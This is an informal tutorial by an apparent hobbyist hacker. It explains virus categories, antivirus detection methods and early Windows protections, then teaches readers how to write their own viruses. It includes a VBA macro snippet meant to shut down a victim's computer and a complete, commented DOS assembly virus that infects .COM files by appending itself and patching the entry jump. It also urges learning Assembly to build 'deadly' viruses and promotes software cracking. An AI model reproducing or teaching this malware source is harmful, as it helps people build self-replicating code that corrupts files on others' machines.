After I wrote the Journals on Happy99 and Melissa, I got many emails asking me regarding the working of a Virus. How it actually infects the computer and how can I make my own Virus;.

Well This Journal is aimed at making it clear as to how a Virus Infects something and how exactly it works. I will also be giving an introduction to making your own Virus.

A virus is basically an executeable file which is designed such that first of all it should be able to infect documents, then it has to have the ability to survive by replicating itself and then it should also be able to avoid detection.Usually to avoid detection, a Virus disguises itself as a legitimate program which the user would not normally suspect to be a Virus. Viruses are designed to corrupt or delelte data on the hard disk i.e. on the FAT (File Allocation Table)Viruses can be classified into maily the following categories:

Boot sector viruses can be created without much difficulty and infect either the Master boot record of the hard disk or the floppy drive.The boot record program responsible for the booting of the operating system is replaced by the Virus. The Virus either copies the Master Boot Program to another part of the Hard Disk or overwrites it.They infect the computer when the computer boots up or the computer accesses the infected floppy disk in the floppy drive.

Popular Boot Viruses would be Michealangelo,Stone etc

*********************

NewBie Tip: Don't know what a MBR or a Master Boot Record is? Now first of all understand what a boot record is. Basically the boot record is the first sector of a floppy or the Hard Disk which contains a boot record which contains info like disk architecture, sector and cluster size etc.

The Boot Record of the Hard Disk also has a program known as Boot Loader which loads the OS upon booting.

Now The MBR is the first sector of the Hard Disk which contains the boot record and also additional details like Partiton Table etc.If the MBR is corupted then the OS will not be launched.

*******************

Some programs are viruses in disguise, when executed they load the virus in the memory alongwith the program and perform the predefined steps and infect the system.They infect program files like files with extensions like .EXE, .COM , .BIN , .DRV and .SYS. Some file viruses just replicate while others destroy the program being used at that time. Such viruses start replicated as soon as they are loaded into the memory. As the file viruses also destroy the program currently being used, after removing the virus or disinfecting the system, the program that got corrupted due to the file virus, too, has to be repaired or reinstalled.

Some Popular File Viruses would be Sunday, Cascade

Multipartitite viruses are the hybrid variety, they can be best described as a cross between both Boot Viruses and File viruses.They not only infect files but also infect the boot sector. They are more destructive and more difficult to remove. First of all, they infect program files and when the infected program is launched or run, the Multipartite viruses start infecting the boot sector too.

Now the interesting thing about these viruses is the fact that they do not stop, once the boot sector is infected.Now after the boot sector is infected, when the system is booted, they load into the memory and start infecting other program files.

Some popular examples would be Invader and Flip etc.

They viruses are stealth in nature and use various methods to hide themselves and to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection and hiding from virus scanners.Some can also redirect the disk head to read another sector instead of the sector in which they reside.Some stealth viruses like the Whale conceal the increase in the length of the infected file and display the original length by reducing the size by the same amount as that of the increase, so as to avoid detection from scanners.For example, the whale virus adds 9216 bytes to an infected file and then the virus substracts the same number of bytes i.e. 9216 from the size given in the directory.

They are somwhat difficult to detect.

They are the most difficult viruses to detect. They have the ability to mutate this means that they change the viral code known as the signature each time it spreads or infects.Thus Antiviruses which look for specific virus codes are not able to detect such viruses.

Now what exactly is a Viral Signature? Basically the Signature can be defined as the specific fingerprint of a particular virus which is a string of bytes taken from the code of the virus.AntiViral softwares maintain a database of known virus signatures and look for a match each time they scan for viruses.As we see a new virus almost everyday, this database of Virus Signatures has to be kept updated. This is the reason why the AntiVirus vendors provide updates.

Firstly to understand Macro Viruses you need to understand a Macro. All of you may have definitely used Microsoft Excel or Word,well in Office97 there is a feature known as Macros which allow a particular task which is performed by a user quite often to be repeated again and again by just clicking a play button.They are set of automated instructions or tasks which make work more efficient and fast for the users.Now beneath Office97 there is a Visual Basic Engine,thus we can say that the core of Microsoft’s Office suite is a Visual Basic Engine which runs behind the scenes and can be used for advanced Visual Basic coding.

So macro virus would be a virus which consists of evil or viral macro VBA (Visual Basic Applications.) code which can create havoc in the computer it is executed.These viruses spread quickly and some have random activation, as in it's code can be included many of VB's event handlers.Macro viruses are not platform specific, i.e. a Macro Virus can infect both Windows systems and also Mac systems.But for a Macto virus to infect a system, the Document with the embedded evil macro has to be opened.

Now that I have given you a general introduction to the different types of Viruses, lets move on to their working, how they exactly infect the systems.Firstly, above we discussed that Stealth viruses and Polymorphic viruses are dificult to detect…the question arises why?Let's take the exaple of what most Anti Virus softwares do to detect and catch a Virus. Now most Anti Viruses use a technique knoen as CheckSumming. Firstly understand that an executable file cannot change (like a data file.) unless you upgrade the program.So the checksummer in the Anti Virus software observes all executable files and records their sizes. So while scanning it compares the executable file size with the checksum.So as Steath viruses reduce the the size by he sam amount as was the increase, AntiViruses which use only checksumming methods are not able to detect them. So nowdays antiviruses use a method known as Heuristics.Before I get on to what Heuristic scanning really is… PolyMorphic Viruses have the ability to mutate and can change their known Viral signature and hide from signature based anti viruses which compare the signatures of executable files to the database of Viral signatures known till now and thus cannot detect new viruses.Thus polymorphic Viruses cannot be detected by Signature based anti viruses and Steath Viruses cannot be detected by Checksumming.

In comes in the Heuristic Scanner which do not scan for viruses using signature based techniques but uses a smarter way to scan for viruses.It scand the drive for Typical viral codes and behaviour. But such viruses have a downside too, sometimes they give false alarms and declare an uninfected file to be a virus.

1. The User copies an infected file to the disk.
2. When the infected file is run, it loads the Virus into the memory or the RAM.
3. The new virus looks for a host and starts infecting other files on the disk.
4. The virus makes copies of itself on the disk.
5. The mutation engines on the new viruses generates a new unique encryptic code which is developed due to a new unique algorithm.

Thus it avoids detecting from Checksummers.

1. The user copies the infected file to the Hard disk or a floppy disk.
2. When the infected file is executed, the virus is loaded into the memory.
3. The virus copies the boot record program to another sector and puts a pointer to it on the boot sector.
4. The virus then makes a copy of itself in the disk boot sector.
5. The next time the computer boots from the disk the Virus loads itself into the RAM or memory and starts infecting other files.

1. The user gets an infected Office Doument by email or by any other medium.
2. The infected document is opened by the user.
3. The evil Macro code looks for the event to occur which is set as the event handler at which the Virus is set off or starts infeting other files.

Windows does not include an anti-virus program. However, it includes several features that make it difficult for viruses to infect your computer.(This section also gives valuable info on how a Virus works and can be used to figure out how to write a virus.) It does this by using the following features:

Blocking Direct Disk Access

Some viruses and other programs attempt to bypass the operating system and system ROM BIOS and use INT25h or INT26h to write to the hard disk directly. When a program attempts to access the hard disk in this manner, Windows prevents the program from doing so and displays the error message 'Windows has disabled direct disk access to protect your long filenames. To override this protection, see the LOCK /? command for more information. The system has been halted. Press CTRL+ALT+DELETE to restart your computer.

This feature prevents many viruses from infecting your computer and damaging the data on your hard disk.

Recognising Master Boot Record (MBR) Modifications

Most viruses infect computers by modifying the MBR and hooking the INT13h chain. Windows prevents this type of virus from damaging your data by maintaining a list of the programs that are currently hooking the INT13h chain. Each time you start your comput-er, Windows 95 checks to see which programs are monitoring the INT13h chain, and then compares this list of programs with the list that it recorded the last time Windows 95 started. If any new pro-grams that Windows 95 does not recog-nise have hooked the INT13h chain, it displays the message WARNING: Your computer may have a virus. The Master Boot Record on your computer has been modified. Would you like to see more information?' If you click Yes, the Per-formance tab in System Properties is dis-played, which provides more information and allows you to begin troubleshooting the problem.

When a virus modifies the MBR, the Performance tab in System properties and the Ios.log file generally report that a file called Mbrintl3.sys is causing drives to be accessed in MS-DOS Com-patibility mode.

ldentifing Unknown Device Drivers

Windows 95 maintains a list of all the real-mode device drivers that it can safe-ly replace with its own protected-mode drivers. If you add a new device driver that hooks the INT13h or INT21h chain and the driver is not 0Th the list of driv-ers that can safely be replaced, Windows 95 is forced to access drives using MS-DOS Compatibility mode instead ofpro-tected mode.

When this occurs, Windows displays the message 'A new MSDOS resident program named <filename> may decrease your system performance. Would you like to see more information about this prob-lem?' where <filename> is the name of the new device driver. This allows Windows 95 to identify those viruses that propagate from a device driver instead of modifying the MBR.

Although Windows manages the computer and safeguards your data, you should always use a third party anti-virus package that is specifically designed for the purpose and update it regularly for better pretoection. Microsoft Windows 98 Plus! inicudes McMee Antivirus as an option.

SomeBody once said:

Well I do agree with the age thing but not the social thing. Most virus creators do not create viruses with the attend of creating havoc or destroying computers.Just out of interest they create a virus and then send it to their friends, and like most email orne viruses of today, they will spread like anything and before the virus creator knows it the feds would have started a man hunt to seek him.

Macro viruses are just basically VB code written in the Visual Basic Editor that ships with Office 97 or

Office 2K.

*************

NewBie Tip: To launch the Visual Basic Editor simply press ALT + F11.

************

Macro viruses can have random or multiple activation events. Lets take an example to make it more clear:

Private Sub UserForm_Initialize()
CommandButton1.Accelerator = "C" 'Set Accelerator key to ALT + C
End Sub
Private Sub CommandButton1_Click ()
Dim intshell
intshell =
shell (c:\windows\Rundll.exe, user , ExitWindowsExec")
End Sub

The above snippet of code is supossed to trigger off when the user clicks the command button. So as soon as the user cliks the mouse button the fuction will be activated and a variable by the name intshell is initialised and the victim's computer will shut down without warning.

In the line Private Sub CommandButton1_Click () the CommandButton1 is the object and the _Click is the event..Th event can also also be changed to something else like DblClick, Keypress, KeyDown,Exit, Enter etc etc. so that the macro or the virus is triggered off when the user double clicks, presses a key, the key is up again, when a form is exited or when the form is started.

So if you really want to write a Macro Virus, first you need to learn VB. A good place to start first would be the Online MSDN Library or get yourself a good book.If you already know a bit of the language 'Basic' and have done either Javascript or Java i.e know what you mean by event handlers then I am sure you can learn VBA by just reading the Help and reading the artices at MSDN.

I personally do not like VB and think if you are still to start to learn VB then you should better learn some other language and I do not think that learning VB is worth the trouble to just making a Virus. If your sole aim is to make a deadly virus and create havoc then do not even consider making a Macro Virus i.e. learning VB.You should rather look at learning Assembly.

There are various reasons behind the fact that Macro viruses are not as deadly as Viruses made in Assemby. You may have heard about evil Java applets which when downloaded can create havoc on your pc and you may certainly have heard about the Melissa virus(Read my tutorial on Melissa for Source Code and more info.), well both of them are slow viruses, by that I mean they give time to a user to react and maybe stop infection and they are not efficient. While on the other hand Assembly Viruses do not give the vivtim time to even realise what is happening and before he even knows it, he is infected!!!

I recently got many emails asking me how they could create viruses and what all languages they need to know before they can create an excellent dreaded virus. Well the simple answer to all these questions is Learn Assembly. It allows us to make real deadly viruses which do not give the victim time to react and infects his system even before he knows what is happeneing.

The best way to learn Assembly would be to read the "Art Of Assembly." It is an excellent book which assums that you have quite little programming experience. It is easy to understand and quite impressive.

Read the Art of Assembly online and become a ASM wiz at:

The Art of Assembly Language Programming

Online resource:

You should also get a book solely about the X86 architecture, get it online From

****************

TIP:Assembly not only allows you to make Viruses but alognwith it comes an added advantage: The Power to Crack software. Keep reading the my Cracking Series to learn more on as to how you can crack programs.

****************

Let's move on to the real stuff.In this section I am assuming that you have atleast some experience in Assembly.The following piece of text has been written by me with some help from Drako.

The survival of a virus is based in its ability to reproduce. "So

how the fuck do I make a program reproduce?", you might ask.

Simple, by getting it to copy itself to other files....

The functional logic of a virus is as follows:

1- Search for a file to infect

2- Open the file to see if it is infected

3- If infected, search for another file

4- Else, infect the file

5- Return control to the host program.

The following is an example of a simple virus:

;****************************************************************

; START OF THE EXAMPLE:

;****************************************************************

;Warning, this example is a (piece of shit?)

; - The virus does not test for prior infection

; - it searches only for the first .COM file in the current

; directory

;

; Careful when executing this file, since the first time it's

; executed it will search for and infect the first file in the

; directory. If we later run the newly infected file, it will find

; the first file in its directory, itself. Thus, it will re-infect

; itself over and over.

;===================CODIGO=======================================

;(The variables in a .COM file are relative to offset 100h).

codigo segment 'code'

org 100h ;Organize all the code starting

; from offset 100h

assume cs:codigo,ds:codigo,es:codigo ;Define the use of the

;segments

start proc far ;Start the routine

COMIENZO:

push cs ;Store CS

push cs ;Store CS

; once again.

pop ds ;Bring DS out from stack

pop es ;Bring ES out from stack

call falso_proc ;Call proc. so that its

; address is placed in the stack

falso_proc proc near

falso_proc endp

pop bp ;BP<== Proc. address.

sub bp, 107h ;BP<== BP - Previous directory

;This is done to take the variables relative to BP, since the

;infection displaces the variables at exactly the length of the

; file. At the first infection, instruction "SUB BP, 107h" is

; 107h, so that the contents of BP is 0; when I call a variable

; with "BP+VARIABLE" the value of the variable's address is not

; modified. When I load it , for example, from a 100h byte

; infected file, the instruction "SUB BP, 107h" leaves me at

; address 207h which means BP=100h, the size of the original file.

; Had I called the variable without adding BP, I would have been

; short by 100h bytes.

;Find the first .COM file in the directory

-----------------------------------------

mov ah, 4eh ;Search for the 1st file

lea dx, bp+file_inf ;DS:DX= offset of FILE_INF

;(*.*) so it will search all

;the files, including directory

;names with extensions.

mov cx, 0000h ;Entry attributes

int 21h

;These attributes mentioned in the commentary are the directory's

; entry attributes. When I set the attributes to 0, I'm telling

; DOS to search normal files. If I include a bit combination which

; provides the Hidden, System or Directory attributes, DOS will

; search for files with those attributes, as well as the normal

; files. If the search range includes the Volume bit, the search

; is limited to that.

;These are the bits which correspond to each attribute:

;Bits: 7 6 5 4 3 2 1 0

; . . . . . . . 1 Bit 0: Read only

; . . . . . . 1 . Bit 1: Hidden

; . . . . . 1 . . Bit 2: System

; . . . . 1 . . . Bit 3: Volume

; . . . 1 . . . . Bit 4: Directory

; . . 1 . . . . . Bit 5: File

;

;Bits 6 and 7 are not used as they are reserved for "future

; applications".

;Open file

;----------------------------------------------------------------

mov ah, 3dh ;Open the file.

mov al, 00000010b ;read/write.

mov dx, 009eh ;DX<== DTA(filename) offset

int 21h ;put the handle in AX

push ax ;and store in stack.

;The attributes I'm setting in AL are not the same as before.

; These are the "open" attributes. We are only interested in the

; first 3 bits,

;bits 2 1 0:

;

; 0 0 0 Read only mode

; 0 0 1 Write only mode

; 0 1 0 Read/Write mode

;

;OK, we now have the file attributes stored in AL. What we now

; need to do is to store in DX the offset of the variable where

; I've stored the ASCIIZ chain with the name of the file to be

; opened. In this case, we don't have a NAME_OF_FILE variable.

; Instead, the name is located in the DTA (Disk Transfer Area). I

; we have it in the DTA...... Why? Simply because when we search

; for a file to infect, all the information we need is returned to

; this memory area. This buffer, if it was not reset, is found in

; the PSP; more precisely, it starts at offset 80h and is 43d bytes

; in size.

;

;The DTA format is as follows:

;

;Offset Bytes Function

; 00h 21d Used by DOS for the 4fh service

; (search for the next file)

; 15h 01d Attributes of the file that's been found

; 16h 02d File time

; 18h 02d File date

; 1Ah 04d File size in bytes

; 1Eh 13d File name in an ASCIIZ chain

; (FILENAME.EXT),0

;

;Well, all that remains to be doe is to give DX the position in

; memory where I've stored the filename: "MOV DX, E1h" and its's

; done. But careful now, remember that DTA starts at offset 80h,

; which means I have to pass to DX the value "80h+1Eh = 9Eh". That

; would than leave "MOV DX, 9Eh"; the problem is solved. Now you

are probably asking yourselves what I mean by "handle". The handle

is a number which tells DOS which file we want. DOS gives us a

handle for each file we open so we have to be careful to have the

correct handle for each file which we read/write.

;Read the first 3 bytes.

-----------------------------------------------------

pop bx ;I take the handle from the

;stack to BX

push bx ;and I store it again.

mov ah, 3fh ;Read file.

mov cx, 0003h ;Read 3 bytes.

lea dx, bp+buffer ;and store in the buffer.

int 21h

INFECTAR: ;(infect)

;Move pointer to the start.

---------------------------------------------------

mov ax, 4200h ;I move the write pointer

;to the beginning of the program

mov cx, 0000h

mov dx, 0000h

int 21h

;The pointer's displacement, relative to the position of the

; pointer as specified in AL, is placed in CX and DX.

; Pointer displacement modes set in AL:

; AL <== 00 Move pointer to the beginning of the file.

; AL <== 01 leave pointer where it is.

; AL <== 02 Move pointer to end-of-file.

;Write the first byte (jmp)

-------------------------------------------------

mov ah, 40h ;write the first byte.

mov cx, 1d ;Quantity=1.

lea dx, bp+jump ;DX<== JUMP offset

int 21h

;(Here we still need the handle, but we don't need to set it again

; because the register which contained the information was not

; modified.

;

;The first byte to be written is a JUMP instruction (the symbol for

; the jump is below). What follows the jump is the address of the

; jump, file-length + 1. (test the "+ 1" thoroughly, since this

; can cause problems; if so, multiply by 18 or subtract 23.)

; Hehehehe.

;Since the entire virus code is copied at the end of the file, the

; jump gives the virus control in an infected file.

;Calculating file length

-------------------------------------------------

mov cx, 2 ;Copy 2 bytes.

mov si, 009ah ;SI<== DTA offset

lea di, bp+longitud ;DI<== File LENGTH offset.

rep movsb ;Copy.

;This instruction must have the 'SOURCE' buffer address in DS:SI

; and the address where the string will be copied in ES:DI (in this

; case, I copy the file length of the DTA to the variable

; 'LONGITUD').

sub word ptr [bp+longitud], 3 ;subtract 3 bytes from

;[LONGITUD]

;The JMP is completed

--------------------------------------

mov ah, 40h ;Write.

mov cx, 2d ;Number of bytes.

lea dx, bp+longitud ;DX<== LONGITUD (length)

; offset

int 21h

;Move pointer to end

-------------------------------------------------------

mov ax, 4202h ;Move the write pointer to the

;end of the program.

mov cx, 0000h

mov dx, 0000h

int 21h

add word ptr [bp+longitud],3 ;Restore LONGITUD.

;Copy the virus to the program.

---------------------------------------------------

pop bx ;Restore the handle.

mov ah, 40h

mov cx, 190d ;number of bytes to copy.

lea dx, bp+comienzo ;Start copying from....

int 21h

;Close the file after infection

------------------------------------

mov ah, 3eh ;Close file.

int 21h

;Here, too, we need in DS:DX the address of the buffer which

; contains the filename string, but in this case DS and DX already

; contain those values from before.

NO_INFECTAR:

;==================RETURN CONTROL TO THE HOST=====================

;Copy the buffer which contains the first 3 bytes of the file into

; memory.

------------------

mov cx, 0003h ;Number of bytes (3).

mov di, 0100h ;DI<== offset 100h. Beginning of the

;program in memory.

lea si, bp+buffer ;SI<== BUFFER offset

rep movsb ;Copy.

;What we are doing here is to "fix" the file, since when it was

; infected, the first few bytes are overwritten by the virus. That

; is why we reconstruct the file to its original state, by copying

; the first 3 bytes, which we had stored earlier, into memory.

;Jump to offset 100h

--------------------------------------------------------

mov ax, 0100h ;Address needed to execute the host

jmp ax

;As we mentioned before, in .COM files the executable code begins

; at offset 100h. The information found between 00h and 100h is

; program data, like the DTA for example.

;The main difference between a .COM file and an .EXE is that a .COM

; cannot occupy more than one memory segment, or 65535 bytes.

; .EXEs can, because DOS can 'tailor' them to fit into a number of

; different segments. Unlike.EXE files. .COM files are faithful

; reproductions of the contents of memory.

;====================DATA AREA===================================

buffer db 7d dup(0)

longitud db 2 dup(0)

file_inf db '*.COM',0

jump db 'é',0 ;<----jump ascii

;(The character '0' is the end of the ASCIIZ string)

start endp ;End of main procedure

codigo ends ;end of code segment

end comienzo ;END. Go to COMIENZO

;****************************************************************

; END OF EXAMPLE

;****************************************************************

Well after reading this guide you may be in a position to make simple viruses.I will soon be updating this guide with info on making more deadlier viruses.Till then bye

Vinay Jagtap